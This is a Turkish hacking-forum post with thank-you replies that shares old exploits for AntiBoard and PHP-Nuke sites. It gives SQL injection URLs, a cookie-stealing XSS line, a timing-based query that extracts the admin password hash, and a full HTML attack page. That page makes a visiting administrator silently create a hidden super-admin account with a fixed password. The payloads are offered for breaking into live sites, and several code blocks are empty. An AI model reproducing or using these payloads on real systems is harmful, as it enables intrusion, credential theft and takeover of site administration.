Bazı web site açıkları:

Çok basit bir sistem içinde birçok sql injection ve cross-site scripting açıkları var.

/antiboard.php?thread_id=1%20UNION%20ALL%20select%2 0field%20from%20whatever--&mode=threaded&sort_order=
/antiboard.php?range=all&mode=threaded&thread_id=1&reply=1&parent_id=1%20UNION%20ALL%20select%20field%20from% 20whatever--
/antiboard.php?range=all&thread_id=1%20UNION%20ALL%20select%20field%20from% 20whatever--&sort_order=ASC&mode=threaded
/antiboard.php?thread_id=1&parent_id=1%20UNION%20ALL%20select%20field%20from% 20whatever--&mode=nested&reply=1


XSS attack : script>alert(document.cookie);</script>



SQL Injection açığı

GwvKjox

------------------------------------------------
SQL Injection açığı 2

ke_authors

-----------------------------------------------
SQL Injection açığı 3

e_users

-------------------------------------------------
SQL Injection açığı 4







Bu yöntem çok eski bir yöntem ama verdiğim açıklar 2004 yılına uygundur bazı siteler için.


Kod:





Kod:
yolu/modules.php?name=Reviews&rop=savecomment&id=1&uname=f00bar&score=999999999999999999999999




sistemden cookie çalma bu yolla admin gibi login olabilirsiniz yada md5 hash ini crackliyebilirsiniz




Kod:





bu kod çalışmazsa geri tuşuna basın bidaha ileri tuşuna basın karşınıza admin id si ile md5 hash i gelicektir

admin.php yoluna ulaşmak



Kod:






bu tehlikeli açıklardan biridir phpnuke portalına belirlediğinz dosyalar eklenir adam girdiğinde o dosya yada kod bilgisayarınıza iner oto çalıştırılabilir



Kod:

ip si/bilgisayardaki klasörün adı/



cross site scripting le önemli bilgilere ulaşmak cookie hash vs.vs


Kod:

code here]&thold=0

code here]






modules.php yardımıyla siteden bilgi çalma yönetim paneline login vs.vs


Kod:

uper=1/**/LIMIT/**/1/*



cookie ayıklama kodundaki hatadan kaynaklanaan sitede herhangi bir script çalıştırılması yada istenilen kişinin cookie aracılıyla hash inin bulunması


Kod:




sql injection açığı
database modifiye edilmeye olanak verir admin eklenebilir ve önemli bilgilere ulaşılabilir hash özel mesja yoluyla alınır





Kod:
GwvKjox



admin oluşturma



Kod:



kullanıcı adı dropby23 şifre 12345 olur

image tagların arasına eklenicek kodla admin eklenmesi [.img]kod[./img] gibi



Kod:




kullanııc adı dropby23 şifre 12345 olur
img taglarla belirlenmiş kod admin tarafından okunduğunda god admin olursunuz ve silinemezsiniz

search engine açığı md5 e ulaşmak
devamı extradan


Kod:
SELECT pwd from nuke_authors where name%3d%27God%27 AND IF(mid(pwd,1,1)%3d3,benchmark(150000,md5(1337)),1) /*"

error.php açığı devamlı hata vermesini sağlar sitenin

[code]http://www.siteninadı.com/phpyolu/error.php?newlang=dropby23

yukardaki kodla etkilenmiş siteyi aşağıdaki kodla bi index.hrm hazırlayın ve sadece ona tıklamanız yeterli adminsiniz
Kod:

<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
<br><br><br>
<center>

<FORM action="http://www.sitebibadı.com/error.php" method="POST">

<input type="hidden" name="error" value="<img width='0' height='0' border='0'
src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=dropby23&add_name=God&add_pwd=12345&add_email=kala@hot.ee&add_radminsuper=1'></img>404">
<input type="submit" value="Attack">

</FORM>

hata sayfası olarak bu kodu hazırlayın inde.htm ve adminin görmesini sağlayın ve adminsiniz
kullanıcı adı dropby23 şifre 12345

</center>
<br><br><br>

</BODY>
</HTML>



kolaY Gelsin

Alıntı

---

NaGoD_ :
eline sağlık kardeşim güzel paylaşım_

---

tskkr

eyw

ellerine sağlık

Alıntı

---

b-12 :
Eywallah Kardeşim ancak güncel açıklar versen yeniler için mükemmel olur

---

Alıntı

---

NaGoD_ :
eline sağlık kardeşim güzel paylaşım_

---